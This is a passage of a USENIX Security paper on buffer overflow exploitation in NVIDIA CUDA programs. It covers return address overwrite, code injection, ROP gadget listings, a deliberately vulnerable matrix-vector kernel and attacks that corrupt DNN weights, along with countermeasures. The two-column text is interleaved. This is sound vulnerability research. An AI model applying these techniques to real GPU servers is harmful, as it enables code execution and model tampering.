in [R1] to [R1+0x3c]. that the return address, represented by R20.64, is stored to-
gether with the local variables on the stack, in contradiction
4.2 Return Address Corruption to the conclusions of previous studies.
Return address corruption is a severe security threat as it al-
4d612a00: ef be ad de ef be ad de ef be ad de ef be ad de
lows an attacker to hijack a program’s control flow, potentially *
leading to arbitrary code execution. On CPUs, an attacker can 4d613200: ff 7f 00 00 ff 7f 00 00 ff 7f 00 00 ff 7f 00 00
exploit a stack buffer overflow vulnerability to overwrite the *
4d613280: 00 00 a0 d7 00 00 a0 d7 00 00 a0 d7 00 00 a0 d7
return address on the stack. However, prior studies [38, 48] *
suggest that such exploitation is not feasible on GPUs: they 4d613300: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
claim that on GPUs the return address is stored in an undis- *
4d613380: 10 00 00 00 10 00 00 00 10 00 00 00 10 00 00 00
closed location in the device memory, rather than on the stack
*
(local memory). We reexamine this claim in this section. 4d613400 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
*
4d613480: e0 d8 fa d6 e0 d8 fa d6 e0 d8 fa d6 e0 d8 fa d6
4.2.1 Stack Management *
4d613500: ff 7f 00 00 ff 7f 00 00 ff 7f 00 00 ff 7f 00 00
To understand the management of the return address on GPUs,
we launch a simple CUDA kernel whose only task is to call
Figure 6: Part of the local memory in the dumped device
a device function. The device function allocates a 64B local
memory; the local array and R20.64 (i.e., R21||R20) are
array and fills it with 0xdeadbeef. Figure 5 shows assembly
highlighted; “*” means the data is the same with above.
code snippets of this device function, illustrating the stack
management at the beginning and end of the function. When 4While not explicitly specified in the instruction, RET appears to always
the function starts, certain registers that the function intends retrieve the return address from R20.64 rather than just R20.
4040 33rd USENIX Security Symposium USENIX Association
We further perform an OOB operation on the local array to not make the writable data pages non-executable. We also
overwrite the return address, pointing it into another function found that according to the page table format [2, 45] released
in the program. As anticipated, when the function returns, it by NVIDIA, there is not an “executable bit” (nor a “dirty bit”)
proceeds with the overwritten address, executing the code lo- in the PTE. This implies that GPUs do not check whether
cated there, rather than returning to the original caller address. an address is a legitimate code address before executing its
Similar behavior occurs when we perform an OOB operation content. Note that prior studies claim that executing a data
on global memory (or shared memory) to overwrite the return buffer is infeasible on GPUs; they believe that this is either
address (cf. Table 2). because the code and data addresses are separated, or because
the data pages are not executable [38, 48]. We found that
Takeaway 2: In CUDA, exploiting a buffer overflow neither of these hypotheses is accurate.
vulnerability allows an attacker to modify the return Modifying code pages. Given that data pages are executable,
address stored in the local memory (stack), and there- a natural question that arises is whether code pages are modi-
fore redirect the control flow of the program. fiable. In fact, prior work has already shown that it is possible
to modify code pages on older GPUs. We further verify this
on modern GPUs by examining the device memory before
4.2.2 Return Address on the Stack and after writing to a code page. Additionally, when inspect-
ing the GPU page table format, we notice a “read-only bit” in
In Section 4.2.1, we focus on the scenarios where the return the PTE. However, after analyzing the page table (extracted
address register (e.g., R20 in Figure 5) is pushed to the stack from the device memory), we found that this bit consistently
during the execution of the function. However, the NVCC remains unset, even for code pages.
compiler does not always opt for this approach. Rather than
pushing the return address register to the stack, the compiler
Takeaway 3: NVIDIA GPUs do not differentiate be-
often avoids using that register throughout the function. It only
tween code and data pages.
chooses to push this register if it is challenging (or infeasible)
to ensure that this register remains untouched in the function.
Below are some scenarios where the return address register is
pushed to the stack. 4.4 CUDA ROP
1. The device function is recursive. Return address corruption can also lead to code reuse attacks,
of which ROP is a primary example. ROP has proven to be
2. The device function has a substantial number of local vari- highly effective on CPUs, with numerous ROP gadgets found
ables, resulting in insufficient registers (i.e., register spill- in commonly used library code, such as libc. Here we study
out). the feasibility of ROP on modern GPUs.
CUDA library code. Upon inspecting the content of the de-
4.3 Code Injection vice memory during the execution of a CUDA program, we
found that, besides the application-specific code, there is ad-
Executing data pages. With the capability to overwrite the ditional code loaded into the device memory. This additional
return address, the attacker can redirect the execution to a data code is the same for every CUDA program. We compare this
page which they have filled with shellcode. Then, when the code with the machine code of common CUDA libraries and
function returns, the execution is diverted to this malicious found that this code is part of libcuda. NVIDIA describes
code, resulting in a code injection attack. Such attacks have libcuda as the CUDA driver API library, which handles
already been mitigated on CPUs: for example, most CPU tasks related to direct interaction with the GPU, such as mem-
systems have the WˆX policy implemented, which mandates ory management, error handling, and stream management.
that every memory page can be either writable or executable, Functions within this library include (but are not limited to)
but not simultaneously both. This prevents the shellcode from printf, cuMemcpy, and cuMemFree. In addition, our experi-
being directly executed. However, we found that this policy ments show that after redirecting the control flow of a CUDA
is not implemented on modern GPUs. program to an address within this driver API code, we can
Our results show that by manipulating the return address, execute this code without triggering any errors.
we can redirect the control flow to a global memory address CUDA ROP gadgets. We examine this driver API code and
and execute the data there (as code). We can also change the found 190 return instructions (RET). Out of these RET instruc-
control flow to point to a local memory address and execute tions, only 52 are accompanied by an instruction that pops the
the data on the stack.5 These findings suggest that GPUs do return address. This means, there are only 52 possible ROP
5 The control flow cannot be redirected to a shared memory address, gadgets in this drive API code, consisting of 7 memory cor-
meaning we cannot execute the data stored in shared memory as if it were ruption gadgets and 45 others. Listing 7 shows two example
code. gadgets: the first one writes data from a register to a mem-
USENIX Association 33rd USENIX Security Symposium 4041
ST.E.64 [R28.64], R4 ; /** Store gadget **/ LD.E.STRONG.GPU R5, [R6.64+0x5c] ; /** Load-and-store gadget **/
BSYNC B7 ; LOP3.LUT R0, R0, 0xffff, RZ, 0xc0, !PT; /** Logic operation **/
LDL R0, [R1] ; IADD3 R0, R0, 0x4, RZ ;
BMOV.32 B6, R27 ; IMAD R4, R5, 0x20000, R0 ;
LDL R20, [R1+0x18] ; IMAD.MOV.U32 R5, RZ, RZ, RZ ;
LDL R21, [R1+0x1c] ; ST.E.64 [R28.64], R4 ; /** Store **/
LDL R2, [R1+0x4] ; BSYNC B7 ;
LDL R16, [R1+0x8] ; LDL R0, [R1] ;
LDL R17, [R1+0xc] ; BMOV.32 B6, R27 ;
LDL R18, [R1+0x10] ; IMAD.MOV.U32 R4, RZ, RZ, R2 ;
LDL R19, [R1+0x14] ; LDL R20, [R1+0x18] ;
LDL R22, [R1+0x20] ; LDL R21, [R1+0x1c] ;
LDL R23, [R1+0x24] ; LDL R2, [R1+0x4] ;
LDL R24, [R1+0x28] ; LDL R16, [R1+0x8] ;
LDL R25, [R1+0x2c] ; LDL R17, [R1+0xc] ;
LDL R26, [R1+0x30] ; LDL R18, [R1+0x10] ;
LDL R27, [R1+0x34] ; LDL R19, [R1+0x14] ;
LDL R28, [R1+0x38] ; LDL R22, [R1+0x20] ;
LDL R29, [R1+0x3c] ; ... /** Pop R23 to R29 **/
IADD3 R1, R1, 0x40, RZ ; IADD3 R1, R1, 0x40, RZ ;
BMOV.32 B7, R0 ; BMOV.32 B7, R0 ;
RET.ABS.NODEC R20 0x0 ; RET.ABS.NODEC R20 0x0 ;
Figure 7: CUDA ROP gadgets.
ory address, while the second one reads data from a memory 11.2 to version 12.4. The results consistently demonstrate that
address and then writes it to another address. Unfortunately, these vulnerabilities exist across all tested GPUs, regardless
our analysis suggests that this CUDA gadget set is not Turing of the driver/CUDA version used. The complete list of the
complete. However, later in Section 5 we show that even with tested GPUs is provided in Appendix A.
these limited gadgets, the attacker can significantly reduce the
performance of DNN-based applications on GPUs. In addi-
tion, using the memory corruption gadgets, we might be able 5 Case Study: Corruption Attacks on DNN
to modify the CUDA code (which is not write-protected) to
create a Turing-complete collection of gadgets, thus achieving In this section, we demonstrate how the GPU memory corrup-
arbitrary computation. tion vulnerabilities discussed in Section 4 can pose significant
Note that it is difficult to have unintended ROP gadgets, security risks for DNN-based applications, which are one of
since all the GPU instructions must be 8B aligned. In addition, the most common GPU applications.
including other common CUDA libraries, such as libcublas
and libcudnn, does not really bring more ROP gadgets: these 5.1 Threat Model
libraries are so optimized that the return address is almost
never pushed to the stack; it is typically stored in a register Victim. The victim is a DNN-based application running on
instead. a server equipped with a modern NVIDIA GPU. This appli-
cation receives requests from remote users, processes these
requests using a DNN model, and sends the responses back.
Takeaway 4: ROP can be used to read or write the
We assume that some of the CUDA kernels involved in the
memory on NVIDIA GPUs.
process of DNN inference have memory corruption vulner-
abilities, (the vulnerability examples will be discussed later
Generality. In this section, we discuss and present the in- in Section 5.2). As a common practice, model parameters,
vestigations using the platform specified at the beginning such as weights, are loaded into the device memory during
of this section. However, the conclusions drawn from these application initialization. To minimize response latency, these
investigations, including the feasibility of memory corrup- parameters persist in memory across user requests, rather
tion across memory spaces (cf. Table 2), and the potential than being reloaded for each new request or removed after
for code injection and code reuse attacks, are applicable to processing a request.
other modern NVIDIA GPUs as well.6 We have verified these Attacker. The attacker is a remote user who can send requests
vulnerabilities on multiple NVIDIA GPUs spanning several to the victim application. By crafting a malicious request (de-
recent architectures, including Volta, Turing, Ampere, and tailed in Section 5.2), the attacker is able to exploit a buffer
Ada Lovelace; we conduct experiments on these GPUs with overflow vulnerability in the GPU kernels used by the vic-
various NVIDIA drivers ranging from version 470.63 (re- tim application. The primary goal of the attacker is to alter
leased in July 2021) to version 550.67 (released in March the model parameters, such as the weights, through this vul-
2024), and multiple CUDA toolkits ranging from version nerability. Consequently, the inferences for future requests
6 The specific details, such as the number of ROP gadgets, may vary from other users will be compromised. We assume that the
slightly depending on the CUDA version. attacker has knowledge of the layout of the victim’s DNN
4042 33rd USENIX Security Symposium USENIX Association
1 /* * Device func f o r maxtrix − v e c t o r m u l t i p l i c a t i o n * */
each thread transfers the necessary portion of the vector from
2 /* * T: the input matrix * */ global memory to its local memory prior to the calculation.
3 / * * V: t h e i n p u t v e c t o r * * /
4 /* * R: the r e s u l t vector * */
We deliberately introduce a vulnerability in this kernel: it
5 / * * m: t h e number o f rows i n T * * / lacks proper checks to ensure that the size of the vector por-
6 / * * n : t h e number o f c o l u m n s i n T * * /
7 _ _ d e v i c e _ _ v o i d matvecmul ( s c a l a r _ t * T , s c a l a r _ t * V,
tion handled by each thread does not exceed the capacity of
s c a l a r _ t * R , i n t m, i n t n ) the thread’s local array. Consequently, a stack overflow can
8 {
9 scalar_t arr_local [64];
occur when the vector size, which is controlled by the user
10 i n t n c o l s = n / ( blockDim . y * blockNum ) ; (explained below), is larger than expected.
11 i n t c o l 0 = b l o c k I d x . y * blockDim . y+ t h r e a d I d x . y ;
12 f o r ( i n t k = 0 ; k< n c o l s ; k +=1)
Triggering the buffer overflow vulnerability. In order to
13 a r r _ l o c a l [ k ] = R [ c o l 0 * n c o l s +k ] ; trigger the vulnerability in Listing 5, we assume that the size
14 ...
15 }
of the vector (n) is controlled by the users. An example of this
situation occurs during the data preprocessing stage. Specifi-
Listing 5: The device function for matrix-vector cally, the size of the input data provided by the user may not
mulpiclication with a buffer overflow vulnerability. always match the required input size of the DNN model. For
model weights. example, a user might provide an image of size 512×1024
pixels, while the DNN model is designed to process images of
only 256×512 pixels. To handle such discrepancies, a convo-
5.2 Application Setups lution layer might be used to preprocess the user input before
Under the aforementioned threat model, we choose four feeding it into the DNN model. This convolution layer often
widely used vision models as potential victims for our eval- employs matrix-vector multiplication for performance opti-
uation: ResNet-18 [26], ResNet-50 [26], VGGNet [54], and mization [16]. In this preprocessing convolution layer, the
Vision Transformer (ViT) [35].7 We implement these models dimensions of the matrix and vector (m and n) are determined
with popular DNN frameworks in cloud environments, such by the size of the user input. This potentially allows a user
as PyTorch [49]. to trigger the vulnerability in Listing 5, if the input size is
We host the DNN inference application (i.e., the victim significantly larger than the size expected by the DNN model.
application) in a virtual machine on a cloud system equipped
with a server-grade GPU, which is different from the system 5.3 Attack Methods and Results
used for the experiments in Section 4. We utilize NVIDIA’s
virtual GPU (vGPU) technology to virtualize the GPU [13]. In this section, we examine the two strategies that an attacker
This is a common configuration for DNN inference in cloud can employ to modify the weights: code injection and ROP
environments [7, 8]. The detailed specifications of this sys- attacks. We discuss the specific steps an attacker must take to
tem can be found in Appendix D. Note that vGPU does launch these attacks, as well as the resulting outcomes.
not support CUDA ASLR; with vGPU, addresses are not
randomized even when ASLR is activated. We keep CUDA 5.3.1 Code Injection Attack
ASLR activated in our configuration as it is the default set-
We implement the code injection attack as a controlled weight
ting. However, it has no effect. We discuss CUDA ASLR in
attack: the attacker has control over the data written to mem-
non-virtualized environments later in Section 6.2.
ory and can modify the weights to any desired value. Specifi-
Previous work [18] has suggested that modern DNN frame-
cally, the attacker prepares a data buffer with shellcode that
works may be vulnerable to GPU buffer overflow issues, but
writes specific values to given addresses, and uses a stack over-
has not disclosed any specific instances. Similarly, we have
flow vulnerability to redirect the control flow to this buffer
not identified any overflow vulnerabilities in these frame-
(cf. Listing 5). Details of the shellcode can be found in Ap-
works. However, the goal of this paper is not to uncover such
pendix C. There are three steps in the attack:
vulnerabilities; we leave that task for future research. Instead,
for the purpose of our evaluation, we intentionally introduce Step 1: The attacker prepares a data buffer whose size is
buffer overflow vulnerabilities into the DNN frameworks. large enough to trigger the buffer overflow error in
Buffer overflow vulnerability. We include a CUDA device the victim (cf. Listing 5) when this buffer is sent to
function for matrix-vector multiplication (with an overflow the victim for DNN inference.
vulnerability) in the victim application, as shown in Listing 5. Step 2: The attacker manipulates the data in the buffer to
Matrix-vector multiplication is important and commonly used achieve two critical objectives: 1) the local array of
in DNN inference. This code uses multiple CUDA threads each thread (arr_local in Listing 5) is filled with
for each row in the matrix to calculate the partial sums, and expected shellcode after this buffer is copied to the
7We also test the memory corruption attacks on several large language local memory; 2) the return address of each thread
models (LLMs) which we obtain from Hugging Face [10], the details can be is overwritten with the address of this local array
found in Appendix E. (where the shellcode resides), after the data copy.
USENIX Association 33rd USENIX Security Symposium 4043
Table 3: The DNN inference accuracy with the weight modification attacks (only for weights in the first layer).
DNN model Clean acc. Weight modification (controlled) Weight modification (uncontrolled)
10% 20% 50% 100% 10% 20% 50% 100%
ResNet-18 (CIFAR-10) 87.37% 10.00% 10.00% 10.00% 10.00% 87.14% 87.32% 81.65% 10.83%
VGG-19 (CIFAR-10) 83.56% 13.46% 13.46% 11.19% 9.66% 74.90% 62.77% 59.01% 10.00%
ResNet-50 (ImageNet-1K) 84.97% 58.21% 55.21% 54.75% 44.35% 84.93% 84.27% 80.64% 65.33%
ViT (ImageNet-1K) 93.64% 0.09% 0.08% 0.12% 0.09% 92.78% 90.56% 90.33% 88.54%
These preparations are crucial to ensure that when the weights. In the code injection attack where the attacker can
buffer overflow is triggered, it leads to the expected specify the desired weight value, we choose a large value
code injection attack. for each weight. This is because most weight values in DNN
Step 3: The attacker initiates a DNN inference request using models are very small; using a large value is expected to
this data buffer as the input. substantially impact the model performance. As shown in
the table, this approach significantly reduces the accuracy
5.3.2 ROP Attack across all tested models. ResNet-18 and ViT are especially
We implement the ROP attack as an uncontrolled weight affected, with the accuracy nearly mirroring random guesses.
modification attack: the attacker repeatedly executes a single In contrast, in the ROP attack where the attacker does not
memory write gadget to modify the weights. The attacker have control over the modified weight value, the accuracy
controls the register providing the address used in the write remains largely unaffected. This is because the ROP gadget
operation, but does not control the register that supplies the used in the attack happens to change the weights to a small
data to be written. Details of the gadget are in Appendix B. value, rather than a large value, which is close to the original
Similar to the code injection attack introduced in Sec- values of the weights.
tion 5.3.1, this ROP attack also has three steps, which are
very similar to those in the code injection attack. However,
the objectives in the second step, preparing the data buffer,
6 Discussion
are slightly different. Specifically, the attacker needs to ma-
nipulate the data in the input buffer to ensure that, after the 6.1 BSYNC in CUDA ROP Gadgets
data copy, 1) the return address on the stack is overwritten Usage of BSYNC. CUDA provides synchronization mecha-
with the address of the ROP gadget, and 2) certain registers, nisms at different levels. The BSYNC instruction is specifically
which will be used by the ROP gadget, receive the expected used for intra-warp synchronization. Although threads in a
values when popped from the stack. warp are intended to execute the same instruction simulta-
neously, some scenarios, such as conditional branches, can
5.3.3 Address of the Malicious Code lead to thread divergence. BSYNC and BSSY are used to man-
age such situations: BSSY signals the hardware to prepare for
In the aforementioned two types of attacks, in order to modify
divergence and specifies the address for re-convergence [25].
the DNN weights, the attacker needs to know the address
BSYNC serves as the synchronization barrier: when a thread in
of the malicious code (either the ROP gadgets or the shell-
the warp reaches BSYNC, it waits for other threads in the warp.
code). As explained in Section 5.2, CUDA ASLR has no effect
We found that BSYNC and BSSY always appear together (in
when using vGPU, making this address predictable and stable
a pair) in CUDA binaries. However, this pairing might not
across executions. As a result, it is rather straightforward for
be maintained in ROP gadgets. For example, the gadgets in
the attacker to determine the address of the shellcode/ROP
Figure 7 contain only BSYNC but not BSSY. This means, the
gadgets. For example, once the attacker profiles the memory
re-convergence address is not specified when BSYNC executes,
of one NVIDIA GPU and identifies the addresses of the ROP
which may cause an error. Interestingly, our analysis reveals
gadgets, it can launch ROP attacks on all NVIDIA GPUs of
that if the threads in a warp do not diverge, BSYNC does not
the same generation and using the same CUDA toolkit, since
influence the execution. Thus, as long as threads remain in
these gadgets are loaded at fixed addresses. We discuss the
sync when executing a ROP gadget, the gadget will function
scenarios in which ASLR takes effect (in native environments
as expected without being affected by BSYNC. This is a feasi-
without virtual machines) in Section 6.2.
ble condition, especially for DNN-based applications, where
thread divergence rarely occurs.
5.3.4 Results
We test the accuracy of the model after modifying the weights 6.2 CUDA ASLR
in the first layer of each model, using the attack methods in
Section 5.3.1 and Section 5.3.2. Table 3 shows the accuracy In non-virtualized environments, CUDA supports ASLR for
results after modifying 10%, 20%, 50%, and 100% of the both data and code. In addition, the activation of CUDA ASLR
4044 33rd USENIX Security Symposium USENIX Association
depends on the ASLR settings in the OS. If ASLR is enabled that occurs during the data transfer between CPU and GPU
in the OS, CUDA ASLR is also enabled (by the GPU driver), memory [3]. This allows a remote attacker to escape the sand-
reflecting a similar level of randomization (e.g., no, conserva- box through a crafted HTML page. In addition, in 2023, it
tive, or full randomization [11]) as the one in the OS. Note was demonstrated that buffer overflows can also occur within
that, as mentioned in Section 5.2, CUDA ASLR does not WebGL programs running on GPUs, causing the browser to
function in virtualized environments with the vGPU technol- crash [4].
ogy [13]. Furthermore, previous studies on fuzzing ML frameworks
CUDA ASLR, when functioning, makes it more difficult (e.g., [18]) have identified significant bugs in their GPU ker-
for the attacker to obtain the address of the shellcode and nels. These include computation bugs, which lead to inac-
thus can help mitigate code injection attacks. However, the at- curate results, and crash bugs, which can cause the entire
tacker may be able to bypass CUDA ASLR through GPU side application to crash. However, these preliminary fuzzing stud-
channels (e.g., [58]). In addition, we found that the CUDA ies have not yet revealed any exploitable memory errors in
driver API library mentioned in Section 4.4 is always loaded these frameworks, which we leave for future work. Note that
at a fixed address, even when full randomization is applied. given the similar programming model between CUDA and
Therefore, we cannot rely on CUDA ASLR to completely stop C/C++, we believe it is likely that exploitable memory bugs
the attacker from exploiting the ROP gadgets in this library. exist in these frameworks.
6.3 CUDA JOP 6.5 CUDA Heap Exploitation
Similar to ROP, jump-oriented programming (JOP) [15] is CUDA supports dynamic memory allocation: buffers dynam-
also an advanced code reuse attack technique. Instead of ically allocated in CUDA kernels (using the malloc() func-
chaining gadgets that end in a return, JOP makes use of gad- tion) reside in the GPU’s heap memory.8 The heap mem-
gets that end in an indirect jump. These jumps use registers to ory is persistent during the lifetime of a GPU process and
determine the destination address. To chain the JOP gadgets is shared among the kernels in this process. NVIDIA has
we need a “dispatcher” (also called “dispatcher gadget”). Its not released the specific memory allocator used in CUDA.
role is to load the address of the next gadget into the appro- However, our experimental results suggest that this allocator
priate register and then jump to it. follows policies similar to those in CPU memory allocators
On NVIDIA GPUs, the indirect jump instruction is BRX (e.g., ptmalloc [14]). Consequently, CUDA programs may
(e.g., “BRX R3, 0xa0”). With this instruction, it is possible also be vulnerable to spatial/temporal heap exploits, similar
to form JOP on GPUs. As mentioned in Section 4.4, we did to those found in CPU programs. However, the use of dy-
not find any ROP gadgets in common CUDA libraries such as namic memory allocation on GPUs is generally discouraged
libcudnn and libcublas. However, we found that some of due to its significant performance overhead [33]. After an-
these libraries do use BRX and therefore contain JOP gadgets. alyzing common CUDA applications and benchmarks, we
Unfortunately, after analyzing these gadgets, we found that did not find any scenario where dynamic buffer allocation is
they can only perform limited functionality. For example, the used. Thus, we believe that this issue is much less significant
libcuda.so.470.63.01 library contains 156 JOP gadgets, compared to overflows in memory that is statically allocated
but 151 of these are merely for shifting register values. Similar (local/global/shared memory).
observations have been made with other common CUDA li-
braries, such as libcudnn_cnn_infer.so.8.2.2. However,
we may combine the ROP and JOP gadgets to achieve more 6.6 Countermeasures
functionality. More details of this can be found in Appendix F. OOB detection tools. There have been many tools to statical-
ly/dynamically detect buffer overflow errors in GPU programs.
6.4 Memory Errors in Real-World GPU Appli- First, NVIDIA Compute Sanitizer [40], a tool for GPU mem-
cations ory safety checks, is based on dynamic binary instrumenta-
tion: it intercepts every program instruction at runtime before
Memory errors, especially buffer overflow errors, have been the execution. While effective, this approach introduces con-
identified in existing GPU applications. First, a previous siderable performance overhead. Second, cuCatch [57] is a
study [22] analyzed 175 commonly used GPU programs in compile-time tool that can help detecting both spatial and
16 benchmark suites and found 13 buffer overflow errors in temporal memory errors during the execution of a CUDA
7 of these programs; some of these errors are very similar to program. It stores the necessary metadata for memory safety
the one we assumed in the ML attacks. Second, buffer over- 8 Heap memory is different from global memory. Global memory buffers
flow errors have also been found in web browsers that utilize can only be allocated by the CPU code (prior to a kernel launch, cf. Sec-
GPUs to accelerate rendering tasks. For example, in 2022, tion 2.3), while heap buffers can be allocated by the GPU code during the
researchers discovered a buffer overflow error in Chrome execution of a CUDA kernel.
USENIX Association 33rd USENIX Security Symposium 4045
checks in a table, with one entry for each allocation. Given overflow to overwrite function pointers, therefore redirect-
a pointer, the correpsonding table entry index can be either ing the execution flow. It further shows that the function call
embedded in the upper bits of the pointer (if possible), or and return mechanism on these GPUs is based on a PRET in-
stored in the shadow memory. cuCatch introduces much less struction followed eventually by a RET instruction. The PRET
performance overhead compared to NVIDIA Compute San- instruction stores the return address in an unknown location,
itizer. However, it is important to note that neither of these making the traditional ROP impractical on these GPUs. In
tools can achieve a 100% detection rate. addition, this research concludes that code and data address
Stack cookies. Stack canaries or stack cookies are secret val- spaces are separated and thus executing data buffers is not
ues that are placed between a buffer and control data on the possible. Note that this work also confirmed the feasibility
stack to monitor for stack overflows. Unfortunately, NVIDIA of CUDA heap overflows, although heaps are rarely used in
has not adopted this technique on their GPUs. In addition, it CUDA programs [33].
is important to note that previous studies have already shown Second, in the same year, Di et al. conducted similar exper-
that the attacker might be able to determine the value of iments on a GeForce GTX 750Ti GPU (Maxwell architecture
the stack cookies, thus bypassing the detection mechanism with sm_50) [19], reaching conclusions that align with those
(e.g., [51]). from Miele. However, compared to Miele’s study, this work
In fact, several canary-based detection tools (for GPU provides a much more detailed analysis on GPU heap over-
buffer overflows) have been proposed by researchers, such as flows.
GMOD [21], GMODx [20], and clARMOR [22]. They insert Third, later in 2021, Park et al. performed a deeper analysis
a canary before and after every GPU buffer (not just stack of GPU memory exploitation techniques. They presented
buffers) and detect buffer overflows by periodically verifying the first attack on DNN frameworks based on GPU memory
the integrity of these canaries. These tools have minimal per- manipulation [48]. The experiments in this work were carried
formance overhead. However, they cannot detect OOB read out on a GTX 950 GPU (Maxwell architecture with sm_50)
operations or non-adjacent OOB read/write operations. and a GTX 1050 GPU (Pascal architecture with sm_60). This
ASLR and PIE. Both Position Independent Executable (PIE) work reached several conclusions that are the same as prior
and ASLR are supported on NVIDIA GPUs. However, we work, such as the hidden return address. However, it also
found that the CUDA driver API library that contains pow- made a new discovery that the code pages are writable on
erful ROP gadgets is not compiled as PIE and is loaded at NVIDIA GPUs.
a fixed address even with CUDA ASLR activated (cf. Sec-
tion 6.2). As a result, ASLR cannot thwart ROP attacks on
GPUs. It is not clear why NVIDIA has chosen this design 7 Conclusion
approach. To effectively prevent ROP attacks, it is crucial for
NVIDIA to compile this library as PIE and ensure that it is In this paper, we present a comprehensive study of the buffer
subject to ASLR. In addition, ASLR makes it more difficult overflow issues in CUDA programs. First, we reverse engi-
for the attacker to launch code injection attacks. However, the neered the mechanisms used to access various GPU memory
attacker might be able to bypass ASLR through side-channel spaces, demonstrating that buffer overflow errors can cause
attacks (cf. Section 6.2). memory corruption across memory spaces and exceed data’s
legitimate scopes. Second, we explored the code and data man-
WˆX policy. Differentiating between code and data pages is
agement policies on GPUs, revealing that traditional code in-
critical for counteracting code injection attacks. As mentioned
jection attacks remain functional on GPUs. We also analyzed
in Section 4, there is already a read-only bit in the PTE. To
the mechanics of function returns and proved the feasibility
understand whether this bit takes effects, we modified the bit
of CUDA ROP. Finally, we demonstrated that the vulnerabili-
through IOMMU during the execution of a CUDA program,
ties discovered in this paper pose significant security risks to
and found that setting this bit effectively prohibits any mod-
DNN applications running on GPUs. The Proof-of-Concept
ifications to the page. Thus, the GPU driver can set this bit
for CUDA code injection and CUDA ROP is available at
for code pages to prevent code modification. In addition, an
https://github.com/SecureArch/gpu_mem_attack.
executable bit needs to be included in order to prevent the
execution of data pages.
Acknowledgement
6.7 Related Work
The authors thank the anonymous USENIX Security 2024
Research in memory vulnerabilities on GPUs has been very reviewers and shepherd for their valuable comments and sug-
limited. First, in 2016, Miele conducted a preliminary ex- gestions that help us improve the quality of the paper. This
ploration into buffer overflow vulnerabilities in CUDA [38]. work is supported in part by the US National Science Founda-
This research shows that, on a GTX TITAN Black GPU (Ke- tion (CCF-2334628, CCF-2154973, CCF-2011146, and CNS-
pler architecture with sm_30), it is possible to exploit a stack 2147217).
4046 33rd USENIX Security Symposium USENIX Association
References [16] Kumar Chellapilla, Sidd Puri, and Patrice Simard. High
performance convolutional neural networks for docu-
[1] https://developer.nvidia.com/blog/ ment processing. In Tenth international workshop on
unified-memory-cuda-beginners/. frontiers in handwriting recognition, 2006.
[2] https://github.com/NVIDIA/ [17] Sharan Chetlur, Cliff Woolley, Philippe Vandermersch,
open-gpu-kernel-modules/blob/main/ Jonathan Cohen, John Tran, Bryan Catanzaro, and Evan
kernel-open/nvidia-uvm/uvm_pascal_mmu.c. Shelhamer. cudnn: Efficient primitives for deep learning.
arXiv preprint arXiv:1410.0759, 2014.
[3] CVE-2022-4135. Available at https://cve.mitre.
org/cgi-bin/cvename.cgi?name=CVE-2022-4135. [18] Neophytos Christou, Di Jin, Vaggelis Atlidakis,
Baishakhi Ray, and Vasileios P Kemerlis. IvySyn:
[4] CVE-2023-4582. Available at https://cve.mitre. Automated vulnerability discovery in deep learning
org/cgi-bin/cvename.cgi?name=CVE-2023-4582. frameworks. In 32nd USENIX Security Symposium,
2023.
[5] Flan-T5. Available at https://huggingface.co/
docs/transformers/en/model_doc/flan-t5. [19] Bang Di, Jianhua Sun, and Hao Chen. A study of over-
flow vulnerabilities on GPUs. In Network and Parallel
[6] Four data cleaning techniques to improve large Computing: 13th IFIP WG 10.3 International Confer-
language model (LLM) performance. Avail- ence, 2016.
able at https://medium.com/intel-tech/
four-data-cleaning-techniques-to-improve- [20] Bang Di, Jianhua Sun, Hao Chen, and Dong Li. Efficient
large-language-model-llm-performance- buffer overflow detection on GPU. IEEE Transactions
77bee9003625. on Parallel and Distributed Systems, 32(5), 2021.
[21] Bang Di, Jianhua Sun, Dong Li, Hao Chen, and Zhe
[7] GPU optimized virtual machine sizes. Available at
Quan. Gmod: A dynamic GPU memory overflow detec-
https://learn.microsoft.com/en-us/azure/
tor. In Proceedings of the 27th International Conference
virtual-machines/sizes-gpu.
on Parallel Architectures and Compilation Techniques
[8] GPU platforms. Available at https://cloud.google. (PACT), 2018.
com/compute/docs/gpus. [22] Christopher Erb, Mike Collins, and Joseph L.
[9] High-throughput generative inference of large language Greathouse. Dynamic buffer overflow detection for
models with a single GPU. GPGPUs. In IEEE/ACM International Symposium on
Code Generation and Optimization (CGO), 2017.
[10] Hugging Face. Available at https://huggingface.
[23] Google. Google queue hardening. Avail-
co.
able at https://security.googleblog.com/2019/
[11] Linux and ASLR. Available at https://linux-audit. 05/queue-hardening-enhancements.html.
com/linux-aslr-and-kernelrandomize_va_ [24] Mingcong Han, Hanze Zhang, Rong Chen, and Haibo
space-setting/. Chen. Microsecond-scale preemption for concurrent
GPU-accelerated DNN inferences. In 16th USENIX
[12] NVIDIA GPU Microarchitecture. Available at https:
Symposium on Operating Systems Design and Imple-
//www.ece.lsu.edu/gp/notes/set-nv-org.pdf.
mentation (OSDI), 2022.
[13] NVIDIA virtual GPU software documentation v17.0 [25] Ari B Hayes, Fei Hua, Jin Huang, Yanhao Chen, and
through 17.1. Available at https://docs.nvidia. Eddy Z Zhang. Decoding CUDA binary. In IEEE/ACM
com/grid/17.0/index.html. International Symposium on Code Generation and Opti-
[14] The GNU C Library. Available at https: mization (CGO), 2019.
//www.gnu.org/software/libc/manual/html_ [26] Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian
mono/libc.html. Sun. Identity mappings in deep residual networks. In
Computer Vision–ECCV 2016, 2016.
[15] Tyler Bletsch, Xuxian Jiang, Vince W Freeh, and
Zhenkai Liang. Jump-oriented programming: a new [27] Dan Hendrycks, Collin Burns, Steven Basart, Andy Zou,
class of code-reuse attack. In Proceedings of the 6th Mantas Mazeika, Dawn Song, and Jacob Steinhardt.
ACM symposium on information, computer and commu- Measuring massive multitask language understanding.
nications security (ASIACCS), 2011. arXiv preprint arXiv:2009.03300, 2020.
USENIX Association 33rd USENIX Security Symposium 4047
[28] Sainathan Ganesh Iyer and Anurag Dipakumar Pawar. [37] John Michalakes and Manish Vachharajani. GPU accel-
